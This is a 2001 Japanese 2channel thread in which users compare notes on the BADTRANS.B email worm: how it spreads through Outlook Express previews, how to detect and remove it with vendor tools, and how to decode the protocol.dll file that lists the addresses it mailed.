109九州男 ◆8U2HuhRg :01/12/03 23:15
>108
サンクス!
110Oxy:01/12/03 23:29
>>22さん のレスを見て言葉が足りないのに気づきました。
ありがとうございます。
ってな訳でもう一度・・・

nifじゃなくても、メールをDLする前に、サーバー上で確認して削除できる
フリーのソフト(もちろんサーバー上で見るので感染しません)
ttp://www.nakka.com/soft/npop/
111前スレ582:01/12/03 23:34
お引越し、お疲れさまでしたーっ!

>ネット屋さん
お引越し&情報の再まとめ、お疲れさまでした。
今回の最新情報を元に先程自サイトにアップしてきました。
転載了承、ありがとうございました。

お礼のみなのでsage
112ネット屋 ◆.t4dJfuU :01/12/03 23:36
なっなるほど!BASE64だったのか!なら簡単に戻せるじゃん。
ツール作るかな。%system%protocol.dllを見てデコードすればいいんでしょ?
明日ヒマだったらつーくろっと。
113名無しさん@お腹いっぱい。:01/12/03 23:41
ちょと質問。
すごい基本的なことかも知れないんだけど、
ファイルが感染している=PCが感染している ってことなの?
シマンテックでスキャンして貰ったら一個のファイルが感染していると出たのよ。
それって受信したRe:メールのファイルなんだけど、もちろん実行していないから。
この状態でWeb巡回したらRe:メールふりまいてしまうのかなぁ。
安全か否かをお教え願いたい。
114ネット屋 ◆.t4dJfuU :01/12/03 23:41
>>92
ディスク容量が足りないと、メールの削除が出来ません。
ゴミ箱を空にするとかして、なんとか空き容量を増やしましょう。
「o20」がなんだかは判りませんが、容量不足のおかげで感染しなかった
と言う落ちだと笑えます。
115ネット屋 ◆.t4dJfuU :01/12/03 23:44
>>113
あなたの認識は正しいです。「ファイルが感染している」がすなわち
「PCが感染している」ことにはなりません。
感染している病気プログラム自体が動かないと、PCが感染している状態には
ならないからです。丁度無力化して飼っているような状態ですね。
間違って実行すると、即、発病ですのでご注意を。
116113:01/12/04 00:13
うむむ。ありがとう、ネット屋さん。気分すっきり。
117名無しさん@お腹いっぱい。:01/12/04 00:14
>>112
ネット屋さん、カッコイイ

漏れも本職なんだから作れよ。。。鬱

>>111
有益なスレをsageんな、ヴォケ
118名無しさん@お腹いっぱい。:01/12/04 00:17
もう毎日じゃんじゃか来てウザすぎ。
どうやら自分のサイトにメールアドレス書いてるのが原因らしいと
気づき、mailtoタグをはずしてアドレスを画像にしてみたが、これで
とりあえず大丈夫か?
119名無しさん@お腹いっぱい。:01/12/04 00:19
>>113
心配する前に、駆除しようよ。
無力化されていても飼ってはいけない。

ちなみに、ウイルス付メール数は、
感染ファイル数にカウントされる。
120名無しさん@お腹いっぱい。:01/12/04 00:21
>>118
既にローカルに保存されているファイルがあるから、
もう来なくなるとは、まったく言えない。

これから(初めて)見に来る感染者に対してのみ有効。
121名無しさん@お腹いっぱい。:01/12/04 00:29
我が家はMacなのですが、
Re:メール ファイル付きが来ました。
これって?
Macも感染するの?
122ネット屋 ◆.t4dJfuU :01/12/04 00:33
>>120
っすね。それでも当分病気を駆除しないDQNが大勢居るだろうから、
有効かもしれない悲しい世界ですねぇ。
CodeRedの時は、ターゲットが一応サーバだったし、CodeGreenやBlueも
あったから収束したけど、今回の収束は無茶苦茶時間がかかりそうですね。
123ネット屋 ◆.t4dJfuU :01/12/04 00:36
>>121
えと、>>2 を見てください。
124名無しさん@お腹いっぱい。:01/12/04 00:41
こんな世間で大騒ぎになってるのに、おれんとこにはBadtransが全然こない。
ウイルスが来ると必ず保存している自分としては寂しい。。。
125118:01/12/04 00:46
>>120
あ、ローカルのキャッシュ分も探して来るわけ?やな感じ。
しかしこれ以上増加傾向にならんだけでもかなり助かる。

Nimdaやさーかむは全然来なかったのに、なんでまた今回だけ……
126121:01/12/04 00:46
>ネット屋さん
うっ、ごめんなさい
そしてありがとう。
127ネット屋 ◆.t4dJfuU :01/12/04 00:47
>>125
キャッシュからメアドだけ拾って、投げてくるようです。
漏れも今回初めて来たので、しかも、ウカツにも感染したので、ウツです。
128名無しさん@お腹いっぱい。:01/12/04 00:49
三通目がきた。
添付ファイル、PICS.DOC.scr(29.0KB)
ATT00002.TXT(0バイト)
アドレスは女の子だったので、あけてみた。
129ネット屋 ◆.t4dJfuU :01/12/04 00:53
HOTMAIL on OEがなんか変わったみたいっすね。
病気に感染したファイルとかに関係なく、全部DLせにゃならんようになった?
130九州男 ◆8U2HuhRg :01/12/04 01:16
しかしなんでみんなファイアウォール入れないんだろ?
バックグラウンドで何が起こってるのか
関心ないのかね・・・
131名無しさん@お腹いっぱい。:01/12/04 01:34
>ネット屋さん
SP2当ててても感染したんじゃなかったっけ?
132名無しさん@お腹いっぱい。:01/12/04 01:44
やばいよ。
取引先から来たファイルを開けたらこのウィルスだった!
ノートンのおかげで感染しなかったけど・・・
>132
何もやばいことは無いじゃん
134どう思われますか?:01/12/04 02:31
BADTRANS.Bらしきメールが来ました。メーラはAl-mail1.32で、これだと
メールを開かずにテキストファイルとして保存できるので、テキストにして
保存。秀丸でオープンして中を見て、ごみ箱へ。もちろんごみ箱は空に。
…この一連の操作では添付ファイルを実行してないので感染しないはず。
で、そこでシステムを終了させ、しばらく経ってから起動したら挙動不審。
●ハードウェアを変更したときに出る、BIOSセットアップを促す画面が出る。
●とりあえずセットアップ画面に入り、without saveで抜けて、起動継続。
●M/Bについてるインタフェイス関係全部、新しいハードウェアとして検出
 される。ドライバが自動インストールされる。
●一応ちゃんと起動したのでNVをかけたところ、Aliz発見、駆除。ノートン
 ごみ箱で保護されてたものが見つかったらしい。
●シマンテックのBADTRANS.B駆除ツールで再度検索、異常なし。
●ノートンDiskDoctorをかけたところ、無効なエントリ多数発見、修復。
 起動時の異常の原因と思われる。
…これ、どう思います?ウィルス発見〜駆除の過程は別にお約束どおりで
いいと思うのですが、無効なエントリ多数発見が気味悪い。それもありと
あらゆる場所で見つかった…。
>>128
warata
136名無しさん@お腹いっぱい。:01/12/04 03:20
nortonでウィルス検索して、隔離されたファイルを
(IEではなく)普通にフォルダ開いて確認したら、
エクスプローラーが接続許可を求めてます
なんて感じでZoneアラームが騒ぎ出したよ
アイコンにマウスカーソル合わせたときの
フォルダの左に表示されるファイルのプレビューも
まずいのかなぁ・・・
137ただ書き込みしたいだけ:01/12/04 03:30
☆母(51歳)からウイルスメール来ました!本人は気づいてませんでした。
「ウイルスのファイルがあったから、削除したよ〜」なんていってました。
プレビューの段階で感染してるのにぃ(IE5)。
受け取った人が感染しないようにアドレス帳の人にだけでも「プレビュー表示を
せずに受信してちょうだいね」って電話かけまくりました。(私は知ってる親戚担当で)
そして、しっかりセキュリティー対策をとるようにしました。
2ちゃんねるのおかげで、対策をとることができました。ありがとうございます。

ただ、それだけです。
138名無しさん@お腹いっぱい。:01/12/04 03:33
http://www.jri-jp.com/main.html
かに道楽銀座店ウィルスに感染しました。
気をつけましょう。
>>130
 一時期は導入してたんだけど、マシン非力なんでやめたヨ。
 アタックそれ自体は防げないし、アタック元わかっても報復す
るつもりないし、ウイルスに感染しなきゃ出てかないし…という
ことで。
 防火壁立てて分かるのは、ネットは騒がしいってことか。
>>123
 たしか、マクで窓ソフトを動かすエミュがあったと思うけど、
どういう動作するんかな。たぶん、システムフォルダの位置とか
が違うんで(そもそも無いだろうし)、ファイル置き失敗すると
思われ。
141名無しさん@お腹いっぱい。:01/12/04 06:37
>>100さん
>>108さん
激しく感謝です。2ちゃん始めて以来、最高にありがたい情報です。
Mbaker2(フリーソフト)でprotocol.dllのBase64デコードやってみました。
知り合いに解析頼まれているので....
メアドがたくさん....200以上....はぁ〜
とにかく感謝です!!
142age:01/12/04 07:44
age
143ネット屋 ◆.t4dJfuU :01/12/04 08:09
>>131
それ、間違いでした。W2KのSP2を当てただけでした。
厳密には、W2K+IE5SP2にW2KSP2を当て、その後、IE5.5にしたようです。
このとき、IE5.5にSP2が当たってなかったみたいです。
http://pc.2ch.net/test/read.cgi/sec/1007075829/429
お詫びして訂正します。ごめんなさい。
144ネット屋 ◆.t4dJfuU :01/12/04 08:19
>>134
正確にはわかりませんが、ウィルスとは無関係な気がします。HDDクラッシュの
タイミングがたまたまウィルス受信と重なっただけでは?
>>136
なるほど。エクスプローラ左のちっこいプレビュー画面か。
その挙動を聞くと、確かに感染を開始しようとしているようですね。
「MIMEのBUG」って話だったので、OEだけしか関係しないと思ってい
ましたが、それは本当に「BADTRANS.B」ですか?
145名無しさん@お腹いっぱい。:01/12/04 08:19
>141
やってみたいんだけど・・・
protocol.dll がない。
ネットから切って 感染させてみようかな?
その場合 protocol.dllの内容は 送らなくても送る準備としてリスト作成するんでしょうか?
146ネット屋 ◆.t4dJfuU :01/12/04 08:27
>>145
http://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html
の情報によると、

・メールを送信
・それをProtocol.dllに書き込む
・レジストリキーにKernel32 kernel32.exeを書き込む

となっていますが、うちでは挙動が違いました。
protocol.dllが出来ていなかったにも係わらず、レジストリに書かれていました。
少なくともわたしのマシンでは、レジストリに書かれていて、完全に感染して
いたけれども、protocol.dllがありませんでした。W2Kです。
147ネット屋 ◆.t4dJfuU :01/12/04 08:33
>>141
漏れもツールを作ろうかと思ったけど、>>108 のプログラムで
ホントにデコードできますね。確認しました。作るのやんぴ。
1.protocol.dllをMBAKER2.EXEのアイコン上に落す。
2.MBAKER2.EXEの画面に意味の無い文字列が出る。
3.意味の無い文字列を選択し、デコードメニューからBase64を選ぶ。
改行が入らないけど、まぁ分離できますね。これで送った人の一覧が
完成します。すばらしい。
148名無しさん@お腹いっぱい。:01/12/04 08:52
BADTRANSっていろいろな経路からもらいますが、
こんなヤツからもらった。
teru-kowaiyoo<_omucchi@●●●.odn.ne.jp>
これって、意図的にばら撒いてると思いません?。
どなたか、コメントをよろしくお願いします。
>>148
メールアドレスだけじゃ何もわかりません。
150名無しさん@お腹いっぱい。:01/12/04 10:15
>>148 さんのレスにならないかもしれないけど

自分も少数ながらBADTRANSメールを見ず知らずの方からもらいますね。
自分のホームページの大事な訪問者に違いないのでメール連絡しています。

それで思ったこと。
電機屋さんにインタネット接続してもらったまま使っているとかって人はどう対策を教えてもお手上げです。
困っている人を相手にあこぎな商売を始めるヤツが出てくるんじゃないかと心配です。

今のようにウェブ社会が一般化して拡大しちゃうと、シロートはOE使うな、ネットに繋ぐなじゃ解決にならない。
メーカや販売店も売るだけじゃなくて、真面目にリコールとかアフターサービスしないと明日は暗いよねェ。
151名無しさん@お腹いっぱい。:01/12/04 10:32
なんかこのウィルスで大騒ぎになってるみたいですが
VB2002のメール検索で感染してると思われる
メールが届いたと同時に削除してくれましたけど
これでいいのかな?
152これ読んどけ:01/12/04 10:58
609 名前:ひよこ名無しさん 投稿日:01/12/04 01:06 ID:???
1. IEは5.01SP2 / 5.5SP2 / 6 のどれかに更新。
2. OEは「表示」→「レイアウト」でプレビュー機能を外す。
3. ウィルスが来たら右クリで削除&削除済みアイテムも空にする。
4. 心配ならhttp://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b%40mm.removal.tool.html
  から駆除ツールをDLして実行。検出されなきゃ問題無い。
5. ノートンかバスター入れて最新の定義でスキャンしとけ。

ここまで出来たら(゚д゚)ウマー
これでもわからなかったら(゚д゚)マズー
153ネット屋 ◆.t4dJfuU :01/12/04 11:01
>>151
心配な場合はとにかくチェックを。
154名無しさん@お腹いっぱい。:01/12/04 11:06
>146
ということは
感染しても 実際に送信しないとprotocol.dllはできないんですね?
自分がかかったら 一体何人に送りつけてしまうんだろ?
と、やってみようとおもったけど・・・
今日は nimda が来ました (-.-)
>>154
宅内メールサーバーを立ち上げてテストすれ
156ネット屋 ◆.t4dJfuU :01/12/04 11:20
>>154
あくまでいろんなサイトを見ての情報となので確実とは言い切れませんが、
protocol.dllが無ければ送っていない可能性が高いです。
157151:01/12/04 11:22
>ネット屋さん
レスどもです。すべき対策はちゃんとしていたので大丈夫だと
思うのですが念のためもう一度チェックしときます。
MLにbadteans対策を何通か流したら、
それのレスでbadtransが来やがって、さすがに萎えた。
ここのアドレスを教えたよ。
159名無しさん@お腹いっぱい。:01/12/04 11:44
昨夜TREND MICROのオンラインスキャンで
BADTRANS.Bを駆除したのですが、感染メールを
送信してしまったかどうかチェックしたいです。
protocol.dllはおそらく駆除時に削除してしまった
と思いますが、このオンラインスキャンはどこかに
ログファイルを作成しますか?
160ネット屋 ◆.t4dJfuU :01/12/04 11:50
>>159
駆除の方法はなんでしたか?
161ネット屋 ◆.t4dJfuU :01/12/04 11:56
>>159
あ、オンラインスキャンで検索し、見つかったファイルを削除したのかな?
削除ボタンを押して素直に削除できましたか?
素直に削除できたのなら、感染していなかったのでは?
TRENDMICROのオンラインスキャンで、「BADTRANS.B」が見つかった場合、
Protocol.dllは削除対象になるのでしょうか?はて?
162名無しさん@お腹いっぱい。:01/12/04 12:00
>>158
オンラインスキャンに関連するファイルは、インターネットオプションの
オブジェクトの表示から「ウイルスバスター On-Line」のプロパティ
から探すことができます。たどっていけば見つかるかもしれませんが
自身はありません。
163名無しさん@お腹いっぱい。:01/12/04 12:04
今このウィルスらしきメールが来たんだけど
IESP2ならメール見ても大丈夫?
164名無しさん@お腹いっぱい。:01/12/04 12:09
>>163
添付ファイルに触れなきゃ問題ないだろ。
心配なら>>152を読もう。
165名無しさん@お腹いっぱい。:01/12/04 12:10
>>164
ありがd
166158:01/12/04 12:17
ネット屋さん、162さんレスありがとうございます。
自宅PCなもんで今すぐ確認できないんですが、
感染->駆除(オンラインスキャンによるファイル削除)->IE5 SP2適用
という経緯でした。
おそらくprotocol.dllも削除されてしまっている可能性が
ありますが、帰宅後確認してみます。
167159:01/12/04 12:18
>>166
159の間違いでした。158さんスマソ。
168御礼:01/12/04 12:27
私も2日前感染してしまったのですが、この板における
的確なアドヴァイスのおかげで本当に助かりました。
169名無しさん@お腹いっぱい。:01/12/04 12:28
fun.MP3.pifという29KBの怪しい添付ファイルが来たんですが・・・

アンチウイルスではノーチェック。スキャンしても検出されず。
フォルダにコピーして、アンチウイルスで検疫しようと思ったら
そこで検疫プログラムがフリーズ。
削除しようと右クリックしたらエクスプローラがフリーズ。
ならばと全選択で削除しようとしたら共有違反で削除不能。

どうしましょ?
170名無しさん@お腹いっぱい。:01/12/04 12:42
>>169
BadTrans.Bでケテーイ
とりあえず今のIEの更新バージョンを確認しる!
あとは>>152の対策をやってみるしかない。
171名無しさん@お腹いっぱい。:01/12/04 12:47
>>169
上記、>>2の【病気の詳細情報】、シマンテックのページに記述があります。
第1拡張子MP3、第2拡張子pif、なのでビンゴ。復旧の入り口はLiveUpdate
みたいですが、できるのかな?
172ネット屋 ◆.t4dJfuU :01/12/04 12:48
>>166
TRENDMICROの駆除専用ツールを使ったわけではないのですね?
にもかかわらず、削除できたと。ふむ。
感染している(すなわち病気が実行状態にある)時は、Protocol.dllは
サービスとして動くので、ウィルススキャンの画面上からでは削除できない
と思うのです。削除できたと言うことは、サービスとして動作していない、
つまり、感染していなかった、のではないかと推測します。
また、今、偽造したprotocol.dll(内容はキチントメールアドレス5件をBASE64
エンコードしておいた)をシステムフォルダ内に配置し、検索させましたが、
引っかかりませんでした。protocol.dllは検出対象になってないと思いますよ。
173169:01/12/04 12:49
>>170 サンクス。
昨夜やってみたけど検出されなかった。
シングルクリックだけでエクスプローラがフリーズ
するのでどうしようもない。
しばらく放置するか…鬱だ。
174ネット屋 ◆.t4dJfuU :01/12/04 12:50
>>172
> Protocol.dllはサービスとして動くので
大間違い!Kernel32.exeがサービスとして動きます。訂正します。
>>173
再起動してもダメかい?
176名無しさん@お腹いっぱい。:01/12/04 13:07
>>174
横から質問です。
Win9x系なら、[システム情報(msinfo32.exe)]-[ソフトウェアの環境]-
[スタートアッププログラム]に、kernel32.exeがあれば感染かつactive
状態で、外部へメール送信の可能性がある、ということでいいのでしょうか?
177169:01/12/04 13:10
>>175
フリーズを繰り返すうちにOSが強制終了するからもう何度も再起動したよ
ライブアップデート済みのアンチウイルスではノーチェック
シマンテックサイトの駆除ツールを試したけどノーチェック。
おまけに検疫(アンチウイルスでの隔離)もできない。
???
>>177
セーフモードで再起動して消してみるか
Scandiskしてから消してみる
179ネット屋 ◆.t4dJfuU :01/12/04 13:20
>>176
そんなに単純ではありません。TCP/IP関連だってプログラムだけど、スタートアップに
入ってないでしょ?
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
を見るしかないです。
180 :01/12/04 13:21
sp2にしろなんていわずに初めから6.0にしろっていえばいいのに。
181 :01/12/04 13:22
>>180
したんだけど、重いよー。
SP2で済むんならそっちのほうが。
182 :01/12/04 13:26
>>181
なるほど。
普段ie使ってないからそういってしまってすいません。
183159:01/12/04 13:27
>>172 ネット屋さん
TRENDMICROのオンラインスキャンでは、protocol.dllは
削除されないようですね。スキャンでヒットしたのは
トロイだった(Trojan Sysmtem Cleanerのウィンドウ表示
だった)と記憶していますので、違うファイルを削除(駆除)
したのかもしれません。いずれにせよ帰宅後確認です。
何か有益な情報があれば、またこちらにカキコします。
感染自体はレジストリのkernel32とが存在したことと、
ファイルcp_25389.nlsが存在したことで確認して、
オンラインスキャン(駆除)実行後は、このレジストリ・キー
とファイルが無くなっていたので、駆除完了と判断しました。
ただ念のため、Symantecのスキャンや他の駆除ツールも
試してみます。ありがとうございました。
184ネット屋 ◆.t4dJfuU :01/12/04 13:31
>>183
む!?
> オンラインスキャン(駆除)実行後は、このレジストリ・キーとファイルが無くなっていたので
オンラインスキャンだけでレジストリ消える?あれ?そうだっけか?
185176:01/12/04 13:33
>>179
ありがとうございます。>>1以下の記述と各サイトはあらかた読んだので、
レジストリをみれば良いことはわかっていたのですが、その他に明示的に
現れている所は無いかと思って、質問しました。失礼しました。
186169:01/12/04 14:09
>>178
セーフモードで立ち上げてもフリーズor共有違反で削除不能でした。
別ドライブからコマンドプロンプトで立ち上げてdelしたらどうにか消えました。
しかしなぜアンチウイルスで検出できなかったのかな???
>>184
オンラインスキャンではなくて駆除の方では?
188159:01/12/04 14:23
>>184
正確には「駆除」ではなく「削除」かもしれません。
Trojan System Cleanerのウィンドウ表示があって、
何か削除するか確認するメッセージが出たので、
それを削除する方のボタンを押したような気がします。
189ネット屋 ◆.t4dJfuU :01/12/04 14:23
>>186
プレビューOFFにして操作するといくらか楽では?
HDDに空きは残ってます?
>>187
ですよねぇ。どうやって駆除したかが書かれてないんですよ。
TRENDMICROの駆除ツールを使ったってことですよね、きっと。
190ネット屋 ◆.t4dJfuU :01/12/04 14:27
>>188
なるほど。TSCがバージョンアップしたようですね。Protocol.dllも
削除されるように変更されちゃったかな?確認、ご報告お待ちしております。
191名無しさん@お腹いっぱい。:01/12/04 14:29
>>188
オンラインスキャンではまずシステムがトロイの木馬に
感染しているかどうか調べ、感染していた場合は修復します
〜とか、注意書きに書いていたと思う。

あれの意味が未だにわからない。
どこを調べてどこを修復するのかどこにも書いてない。
謎だ〜。
192159:01/12/04 14:30
>>189
駆除ツールは使っていません。TRENDMICROのオンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp
からの処理しか実行していません。
>>183に書いた駆除確認後に再度オンラインスキャンを全HDDに
対して実行したところ検出されなかったので「駆除完了」と
判断したんですが。
ちなみに今日ウィルスメールが届いたとの報告があちこちから
来ていますので、「感染」は間違いないです。鬱。
193ネット屋 ◆.t4dJfuU :01/12/04 14:49
>>191-192
今日からですよね?なんか変わったの。
%SYSTEMROOT%フォルダ内に、tsc.iniとかtsc.logとか出来てません?
MsgTitle=Trojan System Cleaner
VirusMsg=Trojan System Cleanerが検出され、駆除されました。
NoVirusMsg=Trojan System Cleanerではトロイの木馬は検出されませんでした。[OK] をクリックすると、他の不正プログラムの検出を実行します。
Reboot=トロイの木馬を完全に駆除するには、コンピュータを再起動してください。
Reclean=コンピュータを再起動して、ウイルスバスター On-Line Scan を再度実行してください。
NoPattern=Can not find pattern
NoMemory=メモリ割り当てエラー
こんなのが書かれてるし。なんだかわけわかんねーなー。
194ネット屋 ◆.t4dJfuU :01/12/04 14:56
みなさん、ひょっとして、
%systemroot%\RunOnceEx Log.txt ってあります?
これ、RunOnceかけたアプリの一覧なのでは?
195159:01/12/04 15:15
>>193-194
今使っている会社のPC(NT4.0)、過去にウィルス感染したことは
ありませんが、tsc.ini、tsc.log、RunOnceEx Log.txt
3つともファイルあります。tsc.iniはTRENDMICROオンライン
スキャンの画面を表示させたときに作成されるようですね。
ちなみにtsc.log、RunOnceEx Log.txtは過去の日付になって
いたので、昨日今日の変更で作成されるようになったファイルでは
なさそうです。
196名無しさん:01/12/04 15:21
俺んとこのRunOnceEx Log.txtはIE5.5 SP2をインストールしたログ
ウィルスには感染したことがないからどう変わるかは知らん
むしろIEを使うのが悪い
198案外女性が多いのでびつくり:01/12/04 15:51
俺、私的にある趣味のホームページもってて、毎日Reが結構来る。
その中には、女性もかなり高い比率でくる。
ウィルスのおかげで知ったよ(w サンキューBADTRANS.B!
で、思う。
俺のホームページ閲覧してんなら、激励のメールくれよ!
来るメールは男ばっか。
しまいに、女性のアドレスだけデータベースにして、かた
っぱしから食っちゃうぞ?(w
199名無しさん@お腹いっぱい。:01/12/04 15:52
>194
runonce.exeは両方に存在しているが、logの方は
win9x系にはあるけど、普段使ってるwin2000には無いみたい
200名無しさん@お腹いっぱい。:01/12/04 15:56
>>198
アドレスだけ女性名にしたネカマダターリして(゚Д゚)
201191:01/12/04 16:09
>>193
僕もTSCをローカルで実行してみたりiniを読んでみたりしたんだけど
ちんぷんかんぷん。
どこでどんな処理をしているのかな?プログラミングとかはさっぱり
なんでよくわからないです。
ちなみに僕が最後にオンラインスキャンしたのは5日くらい前です。
202名無しさん@お腹いっぱい。:01/12/04 16:27
>158
俺もそうだよ!
わざとやっているのかと思ったけどBadTransが送信しているからそれはないね
そういえば、どっかの企業からお詫びメール来ていたけど、ヘッダを見てみると
滅茶苦茶厨房な設定しているので笑えた
203ネット屋 ◆.t4dJfuU :01/12/04 16:29
>>201
わたしにもちんぷんかんぷんです。
TRENDMICROが急遽その処理を割り込ませたからには、不都合があったのかナー?
なんて勘ぐってしまいますなぁ。
204名無しさん@お腹いっぱい。:01/12/04 16:38
>しまいに、女性のアドレスだけデータベースにして、
>かたっぱしから食っちゃうぞ?(w
そういうことしそうだと思われてるから、メール来ないんじゃないの?(笑)
まあ、男でも女でも管理人にメールってあんまり出さないもんだよ。

うちには今までメールは来たことないけど、
今は男と女から均等にウィルスメールが来るよ〜。
205愛で空がお味噌汁:01/12/04 16:55
メッセージルールを使って、
件名「Re:」、添付ファイルつき、サイズ40kbのメールは
「ウィルスメール」フォルダに移動させてます。


・・・・・・・・・・・・・・・どんどん溜まっていくよ〜(゚д゚;;)
206名無しさん@お腹いっぱい。:01/12/04 17:26
最近OEにバッドトランスメールが来て、ウイルスバスターや駆除ツールを導入して
対応はしたのですが、フォームなどで書きこみや検索のボタンを押した後の反応がおかしいのです。
凍った様に何秒か止まった後、やっと反映されるんです。
ウイルスが来た時点では、IE5.01、SP2だったのですが…

あと、最近またポスペの方に来たのですが
添付ファイルをウイルスバスターにかけてみたら反応無しでした。
ファイルはCard.DOC.pifなので間違いなくバッドトランスなのですが…
…何故?
>>205
おもろい
>>191
メモリースキャンじゃないのかな。
トロイがメモリ上に展開されて活動していればそれを停止させているのでは。

駆除ツールの↓に相当する部分
1.ワームプロセスの停止:
 「WORM_BADTRANS.B」のプロセスを停止させます。

I. Terminating Worm/Virus processes.
Scanning \SystemRoot\System32\smss.exe
(snip)
Scanning V:\TOOL\駆除ツール\公開用\WORM_BADTRANS.B\fix_badt.com
*** Infected processes were NOT found. ***


>>193
以前と変わっていないと思うが。
209169:01/12/04 17:38
>>206
こっちも似たような状態です。
ノートンアンチウイルスで反応無しでした。
Win2000にIE5.5 SP2でした。
感染時にできるファイルは見つかっていません。
210名無しさん@お腹いっぱい。:01/12/04 18:08
>>206 >>209
TRENDMICROのウィルス情報に、

ただし、ウイルスコードのバグのためか添付ファイルの
エンコード情報が正常に記述されない状態でメール送信を
行う場合があることが確認されています。この場合、添付
ファイルは正常にデコードできず言わば壊れて実行不可能な
状態になりますので、ウイルス活動の危険もありません。

とあります。これじゃない?

>>206のボタンを押した後の反応が変化したのは分からんけど。
211ネット屋 ◆.t4dJfuU :01/12/04 18:19
>>208
あれま。昔と同じ?そかー。
http://housecall.antivirus.com/housecall/start_jp.asp
の真中にあるトロイの木馬云々のところが追加されたような気がしたんだけど、
違ったが。スマソ
212名無しさん@お腹いっぱい。:01/12/04 19:49
なんかQuick Time?のアイコンがでてきてダウンロードできないのですが・・・
213みゆ:01/12/04 20:04
>>210
うちにもエンコードが正常に出来ずにわけのわからぬ文字列の
集合体(やたら長い)みたいなメールが来てました。
214_:01/12/04 20:12
FM ラジオ局 J-WAVE の番組 GROOVE LINE で、昨日生放送中にウィルスをばらまいたらしい。
しかも、/.J によると そのウィルスは、W32/badtrans.b らしいのだが、2ch 住人で誰か確認できる人いる?

http://slashdot.jp/article.pl?sid=01/12/04/0956242&mode=nested

放送局がウィルスばらまいていいのか?(鬱
超良スレすぎ!
ネット屋さんありがとー!
うちにもたくさんきて困ってたんだよね。
216名無しさん@お腹いっぱい:01/12/04 20:48
>214
ttp://homepage.mac.com/vm_converter/diary.html#20011203

ここで生でやってたよん。
217名無しさん@お腹いっぱい。:01/12/04 20:49
自分が感染して誰かにウイルスを送ってしまった場合、
送られた相手は私から来たことがわかるんでしょうか?

私のところに来たメールは、何やらわけのわからない差出人だったので・・・
218九州男 ◆8U2HuhRg :01/12/04 20:56
>217
判ります。
ただ知っている人かどうかは判りません。
219名無しさん@お腹いっぱい。:01/12/04 20:56
>>206
書きこみや検索のボタン押した後で動作がおかしい件、新たに導入したウイルスバスターが
何らかのチェックをしてるためとは考えられないかな。常駐はずしてもなる?
ウイルスバスター使ったことないんで、見当違いだったらスマソ。
220名無しさん@お腹いっぱい。:01/12/04 20:59
yahooやexciteなどのフリーメールでプレビューしただけでも感染してしまうんですか?
221名無しさん@お腹いっぱい。:01/12/04 21:02
>217
まれに差出人の名前をすり替えたりメールアドレスの文字列を適当に
並べ替えて送ったりするウイルスはあるみたいだけど、たいていの場合は
送り主(感染者)のメールアドレスそのままに送られるんじゃないかな。
222ネット屋 ◆.t4dJfuU :01/12/04 21:03
>>220
基本的に同じです。
「OEを使用していて、病気メールが届く」と言うのが基本なので、
プロバイダの正規メールアドレスだろうが、なんだろうが、余り
違いはありません。
プロバイダによっては、病気メールを自動的に削除してくれる有料
や無料のサービスがあるところもあるらしいですが。
223220:01/12/04 21:12
>>222
ありがとうございます。

未読メールにウイルスが送られてしまうそうですが、
フリーメールで感染した場合に、Outlook Expressの未読メールにも
ウイルスが送られてしまいますか?
224ネット屋 ◆.t4dJfuU :01/12/04 21:13
面白ネタを一つ。

http://www.vector.co.jp/soft/dos/util/se002357.html?site=n
で、DOS版の圧縮ソフトを拾います。
解凍して適当な場所に置いてください。
次に
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY
をかけてみてください。
病気じゃないと思うんだがナー(くすくす
シマンテックには報告したので、数日中に直っちゃうと思いますが。
ちなみに、ノートン君製品版ではひっかかりません。
225ネット屋 ◆.t4dJfuU :01/12/04 21:18
>>223
「フリーメール」と言うのは任意の団体が無料で公開しているMTU
(メールのサーバ)です。このメールサーバは別に特殊なものではなく、
一般のプロバイダが使用しているものと大差ないものだと思います。
つまり、それをプロバイダが使おうが、無料で公開しようが、関係ないんです。
「フリーメール」と言うのは、そのメールサーバをどうやって使用させるか
だけが違うだけで、プロバイダが使わせているものと何ら変わりはないこと
をご理解ください。「フリーメール」とは単に政治的にタダなだけで、
技術的には「メールサーバ」です。
226厨房:01/12/04 21:19
>>206
ウイルスバスターの 設定画面>検索設定>リアルタイム検索の検索するファイルの種類
の”トレンドマイクロの推薦設定”を”選択するファイル形式のみ”
に変更してみなよ。
227220:01/12/04 21:22
>>225
詳しいご説明、ありがとうございます。

つまり、フリーメールでウイルスを受信した場合も
Outlook Expressの未読メールにまでウイルスが送られてしまいますか?
読解力が無くて申し訳ありません……ほんとにごめんなさい。
228長くてごめんなさい:01/12/04 21:23
ウイルスに感染したかどうかわからないのですが、
不安だったのでとりあえず駆除ツールを使ってみました。
その後「Protocol.dll」を検索してみても発見されなかったので、
ウイルスには感染してなかったのかな?と思っていたのですが、念の為
>>3のトレンドマイクロ社のチェックを実行したところ、
「ウイルスが駆除されました。トロイの木馬を駆除するには再起動してください」
(文面は正確ではないです。すみません)という表示が出ました。
次にウイルスバスターOn-Line Scanというウインドウが出て
普通にウイルススキャンが始まり、その結果ウイルスは検出されませんでした。

「ウイルスが駆除された云々」というメッセージが気になるのですが、
これはやっぱり感染してたってことですか?
ちなみに、駆除ツールを使用後に>>3のもう一つのオンラインスキャンを
やったときは、何も検出されず、おかしなメッセージもありませんでした。
229ネット屋 ◆.t4dJfuU :01/12/04 21:29
>>227
送られます。OEは何がFreeなのか知りません。
>>228
最初にやった「駆除ツール」とはなんでしょうか?
230228:01/12/04 21:34
言葉が足りず申し訳有りません。
>>3にあるトレンドマイクロ社から対策ツールです。
220はネタでは無かろうか。
232ネット屋 ◆.t4dJfuU :01/12/04 21:39
>>230
少なくとも「BADTRANS.B」には感染していなかったように思います。
TRENDMICROのチェックで「トロイの木馬を駆除した」のようなメッセージが
出たとの事ですが、別の病気に感染していた疑いかな?と思います。
それが何であったのか、どういう弊害がありえたのか?などはちょっと
判りかねますが、少なくとも現状には問題ないと思います。
オンラインウィルスチェックって結局アバウトなのかも?って少し思ってます。
目的達成には十分であるけれども、説明やLOGなど、不備な点はタダだから
許して!って感じにも取れなくはないですね。
233名無しさん@お腹いっぱい。:01/12/04 21:44
>220
yahooとexciteで引っかかったんだけどひょっとして
220の言う「フリーメール」って「WEBメール」のこと?
